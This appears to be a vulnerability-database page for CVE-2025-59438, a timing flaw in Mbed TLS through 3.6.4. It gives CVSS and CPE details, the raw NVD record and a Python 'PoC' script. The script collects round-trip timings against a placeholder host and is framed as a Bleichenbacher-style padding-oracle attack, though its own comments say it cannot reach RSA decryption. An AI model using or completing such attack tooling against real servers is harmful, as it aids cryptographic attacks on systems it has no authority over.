Security Vulnerability Report
CVE-2025-59438 CVSS 5.3 MEDIUM

CVE-2025-59438

Published: 2025-10-21 15:15:39
Last Modified: 2025-10-23 12:35:35

Description

Mbed TLS through 3.6.4 has an Observable Timing Discrepancy (CWE-208, per the weakness entry in the record below). The CPE range ends before 3.6.5, i.e. 3.6.5 is the first fixed release; the record itself does not identify which API or code path leaks timing information.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector (v3.1; recorded in the JSON below as a Secondary metric — the record holds no Primary NVD score)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Reading: network-reachable, low complexity, no privileges or user interaction; low confidentiality impact (an information leak through timing); no integrity or availability impact.

Configurations (Affected Products)

cpe:2.3:a:arm:mbed_tls:*:*:*:*:*:*:*:* - VULNERABLE (versionEndExcluding 3.6.5; the record sets no lower bound)
Mbed TLS <= 3.6.4 (fixed in 3.6.5)
Mbed TLS 3.6.x (3.6.0 - 3.6.4)
Mbed TLS 3.5.x and earlier

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. Note that the listing never performs a TLS handshake — it writes raw bytes to the port and times the first reply, so the server's RSA decryption path is not exercised — and all of its probes are a single unlabelled population of validly padded PKCS#1 v1.5 ciphertexts, so no outlier statistic derived from it can confirm or refute CVE-2025-59438 on a target. Treat it as a timing-collection skeleton, not a working exploit. The PKCS#1 v1.5 attribution comes from the vendor advisory's title ("invalid padding error"), not from the CVE record, which only says "Observable Timing Discrepancy".
python
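# CVE-2025-59438 - Mbed TLS timing side-channel measurement harness
#
# NVD describes the flaw only as an "Observable Timing Discrepancy" (CWE-208)
# in Mbed TLS through 3.6.4; the CPE range ends before 3.6.5, so 3.6.5 is the
# first fixed release. The vendor advisory slug ("invalid-padding-error")
# suggests the leak sits in a padding check, and this script assumes an RSA
# PKCS#1 v1.5 padding oracle (Bleichenbacher-style). That attribution is NOT
# established by the CVE record - confirm it against the advisory.
#
# What this script does NOT do: it never performs a TLS handshake. It opens a
# TCP connection, writes raw bytes and times the first reply, so the server's
# RSA decryption is never reached and the numbers cannot confirm or refute
# CVE-2025-59438. It is a harness for collecting and summarising round-trip
# timings; the transport and probe construction must be replaced before the
# output means anything about the target.
import os
import socket
import statistics
import time

# pycryptodome is third-party and only needed to build probe ciphertexts;
# keep the analysis functions importable without it.
try:
    from Crypto.PublicKey import RSA  # noqa: F401 - used by the __main__ recipe
    from Crypto.Cipher import PKCS1_v1_5
except ImportError as exc:
    RSA = None
    PKCS1_v1_5 = None
    _CRYPTO_IMPORT_ERROR = exc
else:
    _CRYPTO_IMPORT_ERROR = None

TARGET_HOST = "target.example.com"
TARGET_PORT = 443
SAMPLES_PER_TEST = 5000
# Smallest slow-down (ns) above the mean an outlier must show to count as a
# candidate leak. 50 us is well below typical WAN jitter, so only a LAN or
# loopback target can plausibly resolve it.
TIMING_THRESHOLD_NS = 50000
CONNECT_TIMEOUT_S = 5
MIN_SAMPLES = 100  # analyze_timings() refuses to summarise fewer usable samples
# Share of samples above mean + 2*stdev that ordinary, roughly normal jitter
# produces on its own (~2.3 %). An outlier ratio at or below this is noise.
GAUSSIAN_TAIL_RATIO = 0.023


def generate_random_ciphertexts(public_key, count):
    """Return ``count`` PKCS#1 v1.5 encryptions of random 11-byte messages.

    Args:
        public_key: pycryptodome RSA public key (``Crypto.PublicKey.RSA``).
        count: number of ciphertexts to build.

    Returns:
        list[bytes], each ``public_key.size_in_bytes()`` long.

    Raises:
        RuntimeError: pycryptodome is not installed.

    Caveat: ``PKCS1_v1_5.encrypt`` applies its own padding, so EVERY value
    returned here decrypts with valid padding; the message bytes are
    irrelevant to the padding check. A padding-oracle measurement needs a
    labelled mix of valid and invalid probes, which this helper does not
    produce.
    """
    if PKCS1_v1_5 is None:
        raise RuntimeError(
            "pycryptodome is required to build probe ciphertexts"
        ) from _CRYPTO_IMPORT_ERROR
    cipher = PKCS1_v1_5.new(public_key)  # one cipher object serves every probe
    return [cipher.encrypt(os.urandom(11)) for _ in range(count)]


def measure_timing(host, port, ciphertext):
    """Send ``ciphertext`` as raw bytes over TCP and return the round trip in ns.

    Args:
        host: target hostname or IP.
        port: target TCP port.
        ciphertext: bytes written verbatim to the socket (no TLS framing).

    Returns:
        ``int`` nanoseconds from the start of the write to the first reply
        (or to the peer closing), or ``None`` when the connection, the write
        or the read fails or times out.

    Notes:
        * The clock is ``time.perf_counter_ns`` - monotonic and
          high-resolution; ``time.time_ns`` is wall-clock and can jump.
        * The value includes the full network round trip, so server-side
          differences of tens of microseconds are only resolvable on a
          low-jitter path.
        * No TLS record framing is produced. A TLS server will answer with
          an alert or close the connection, so RSA decryption is not reached.
    """
    try:
        with socket.create_connection((host, port), timeout=CONNECT_TIMEOUT_S) as sock:
            start = time.perf_counter_ns()
            sock.sendall(ciphertext)  # send() may write only a prefix of the buffer
            sock.recv(4096)  # reply content is irrelevant; only its arrival is timed
            return time.perf_counter_ns() - start
    except OSError:
        # Covers socket.timeout as well as ConnectionRefusedError /
        # ConnectionResetError, which would otherwise abort the whole run.
        return None


def analyze_timings(timings):
    """Summarise round-trip timings and count slow outliers.

    Args:
        timings: list of nanosecond durations; ``None`` entries (failed
            measurements from measure_timing) are dropped.

    Returns:
        ``None`` when fewer than ``MIN_SAMPLES`` usable values remain (a
        sample standard deviation needs at least two, and a tail estimate
        needs far more), otherwise a dict with ``mean_ns``, ``stdev_ns``,
        ``median_ns``, ``sample_count``, ``outlier_count``,
        ``outlier_ratio`` and ``outlier_gap_ns`` (distance of the nearest
        outlier above the mean; 0 when there are none).

    Caveat: every sample comes from ONE population, so ``outlier_ratio`` is
    not by itself a test for an oracle - about 2.3 % of normally distributed
    samples exceed mean + 2*stdev by construction, and network latency is
    heavier-tailed than that. Compare labelled probe classes instead.
    """
    usable = [t for t in timings if t is not None]
    if len(usable) < MIN_SAMPLES:
        return None
    mean = statistics.mean(usable)
    stdev = statistics.stdev(usable)
    cutoff = mean + 2 * stdev
    outliers = [t for t in usable if t > cutoff]
    return {
        "mean_ns": mean,
        "stdev_ns": stdev,
        "median_ns": statistics.median(usable),
        "sample_count": len(usable),
        "outlier_count": len(outliers),
        "outlier_ratio": len(outliers) / len(usable),
        "outlier_gap_ns": (min(outliers) - mean) if outliers else 0,
    }


def exploit_timing_oracle(host, port, public_key):
    """Collect SAMPLES_PER_TEST round trips and report whether their spread
    exceeds what jitter alone explains.

    Args:
        host, port: target address passed to measure_timing.
        public_key: pycryptodome RSA public key used to build probes.

    Returns:
        The analyze_timings() dict, or ``None`` when too few measurements
        succeeded. Progress and a summary are printed as a side effect.

    A positive verdict here is a lead, NOT confirmation of CVE-2025-59438:
    the probes are a single unlabelled population (see analyze_timings) and
    the transport never reaches RSA decryption (see measure_timing). The
    verdict requires the outlier ratio to exceed the normal-jitter baseline
    AND the nearest outlier to sit at least TIMING_THRESHOLD_NS above the
    mean; a ratio above 1 % alone is met by noise on every reachable host.
    """
    print(f"[*] Starting timing attack against {host}:{port}")
    print(f"[*] Target RSA key size: {public_key.size_in_bits()} bits")
    ciphertexts = generate_random_ciphertexts(public_key, SAMPLES_PER_TEST)
    timings = []
    for done, ct in enumerate(ciphertexts, start=1):
        timings.append(measure_timing(host, port, ct))
        if done % 500 == 0:
            print(f"[*] Collected {done}/{SAMPLES_PER_TEST} timing samples")
    result = analyze_timings(timings)
    if result is None:
        print(f"[-] Too few successful measurements to analyse (need {MIN_SAMPLES}); "
              "check connectivity to the target.")
        return None
    print(f"    Samples: {result['sample_count']}, mean: {result['mean_ns']:.0f} ns, "
          f"median: {result['median_ns']:.0f} ns, stdev: {result['stdev_ns']:.0f} ns")
    print(f"    Outlier ratio: {result['outlier_ratio']:.4f} "
          f"(jitter baseline ~{GAUSSIAN_TAIL_RATIO}), "
          f"nearest outlier gap: {result['outlier_gap_ns']:.0f} ns")
    suspicious = (
        result["outlier_ratio"] > GAUSSIAN_TAIL_RATIO
        and result["outlier_gap_ns"] >= TIMING_THRESHOLD_NS
    )
    if suspicious:
        print("[?] Timing spread exceeds what jitter alone explains. This is a lead, "
              "not proof: repeat with labelled valid/invalid probes inside a real TLS "
              "handshake and compare the two distributions.")
    else:
        print("[-] No timing spread beyond ordinary jitter. This does not show the "
              "target is patched; the harness never reaches RSA decryption.")
    return result


if __name__ == "__main__":
    # Load the target's RSA public key (e.g. from its certificate) and
    # uncomment to run; requires pycryptodome.
    # public_key = RSA.import_key(open("target_cert.pem").read())
    # exploit_timing_oracle(TARGET_HOST, TARGET_PORT, public_key)
    print("[*] PoC for CVE-2025-59438 - Configure target and public key before running")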

References

Vendor Advisory: https://mbed-tls.readthedocs.io/en/latest/security-advisories/mbedtls-security-advisory-2025-10-invalid-padding-error/
Vendor Advisory index: https://mbed-tls.readthedocs.io/en/latest/tech-updates/security-advisories/
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59438", "sourceIdentifier": "[email protected]", "published": "2025-10-21T15:15:39.103", "lastModified": "2025-10-23T12:35:35.187", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mbed TLS through 3.6.4 has an Observable Timing Discrepancy."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-208"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:arm:mbed_tls:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.6.5", "matchCriteriaId": "D9DA7861-39B5-40B3-BF4F-6A79ED188844"}]}]}], "references": [{"url": "https://mbed-tls.readthedocs.io/en/latest/security-advisories/mbedtls-security-advisory-2025-10-invalid-padding-error/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://mbed-tls.readthedocs.io/en/latest/tech-updates/security-advisories/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}